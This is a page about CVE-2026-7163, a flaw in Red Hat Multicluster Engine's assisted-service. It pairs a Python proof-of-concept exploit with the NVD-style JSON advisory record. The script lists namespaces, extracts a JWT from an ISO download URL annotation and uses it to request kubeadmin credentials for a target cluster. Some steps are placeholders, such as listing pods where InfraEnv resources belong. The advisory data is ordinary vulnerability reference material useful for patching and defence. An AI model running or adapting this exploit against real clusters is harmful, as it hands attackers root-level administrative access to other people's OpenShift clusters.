CVE-2026-7163

#!/usr/bin/env python3 import requests import re from kubernetes import client, config # Load kubeconfig for the local hub config.load_kube_config() v1 = client.CoreV1Api() # Step 1: List InfraEnv objects in accessible namespaces namespaces = [ns.metadata.name for ns in v1.list_namespace().items] found_jwt = None for ns in namespaces: # Assuming custom resource definition access, simplified here # In real scenario, use CustomObjectsApi to get InfraEnv infra_envs = v1.list_namespaced_pod(ns) # Placeholder for CR retrieval for env in infra_envs.items: # Check status for ISODownloadURL iso_url = env.metadata.annotations.get('assisted-service/ISODownloadURL') if iso_url and 'jwt=' in iso_url: # Step 2: Extract JWT from URL match = re.search(r'jwt=([^&]+)', iso_url) if match: found_jwt = match.group(1) print(f"[+] Found JWT in namespace {ns}") break if found_jwt: break if found_jwt: # Step 3: Use JWT to access admin credentials target_cluster_id = "target-cluster-id" # ID of cluster to attack headers = {"Authorization": f"Bearer {found_jwt}"} creds_url = f"https://assisted-service-url/v2/clusters/{target_cluster_id}/credentials" response = requests.get(creds_url, headers=headers, verify=False) if response.status_code == 200: print(f"[+] Success! Credentials: {response.text}") else: print(f"[-] Failed to get credentials: {response.status_code}") else: print("[-] No JWT found in accessible InfraEnv objects.")

{"cve": {"id": "CVE-2026-7163", "sourceIdentifier": "[email protected]", "published": "2026-04-30T14:16:36.093", "lastModified": "2026-05-19T09:16:20.183", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the assisted-service REST API, an optional Assisted Installer (assisted-service) component in the Multicluster Engine (MCE), allows an authenticated user with minimal namespace-scoped privileges to obtain administrative credentials for arbitrary clusters provisioned through the hub. \n\nThe credentials download endpoint (GET /v2/clusters/{cluster_id}/credentials, which returns the kubeadmin password) and the kubeconfig download endpoint are operational in AUTH_TYPE=local mode, the only authentication mode available in on-premises ACM/MCE hub deployments. The local authenticator unconditionally grants full administrative access to any request bearing a valid JWT, with no per-endpoint restrictions. A valid local JWT is embedded as a plaintext query parameter in InfraEnvStatus.ISODownloadURL and is readable by any user who has get rights on an InfraEnv object in their own namespace.\n\nThe affected components ship as part of Multicluster Engine (MCE). The Red Hat Advanced Cluster Management (ACM) deployments that include MCE are equally affected.\nThis issue does not affect the hosted SaaS offering (console.redhat.com), which uses a different authentication mode.\n\nSuccessful exploitation gives the attacker the kubeadmin password and kubeconfig for any OpenShift cluster provisioned through the affected hub, granting unrestricted root-level administrative access to those spoke clusters."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-312"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:multicluster_engine_for_kubernetes:2.1:*:*:*:*:*:*:*", "matchCriteriaId": "EA445F39-1169-4161-90A1-7F06F7085A18"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:multicluster_engine_for_kubernetes:2.7:*:*:*:*:*:*:*", "matchCriteriaId": "DE162581-79CA-4FFA-B2F9-44EAF5BE3CD4"}]}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:11511", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://access.redhat.com/errata/RHSA-2026:11512", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://access.redhat.com/errata/RHSA-2026:12116", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://access.redhat.com/errata/RHSA-2026:12337", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://access.redhat.com/errata/RHSA-2026:18584", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:18585", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-7163", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2463152", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}